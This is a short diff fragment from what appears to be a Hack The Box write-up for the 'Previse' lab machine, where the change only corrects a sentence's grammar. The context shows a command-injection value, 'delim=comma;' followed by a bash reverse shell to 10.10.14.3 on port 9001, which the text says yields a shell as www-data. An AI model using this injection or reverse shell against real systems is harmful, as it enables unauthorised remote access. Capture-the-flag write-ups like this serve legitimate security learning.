Kyuu-Ji/htb-write-up/previse/write-up-previse.md

 delim=comma; bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'
 ```

-After URL-encoding command and sending the request, the listener on my IP and port 9001 starts a reverse shell as the user _www-data_.
+After URL-encoding the command and sending the request, the listener on my IP and port 9001 starts a reverse shell as the user _www-data_.

 ## Privilege Escalation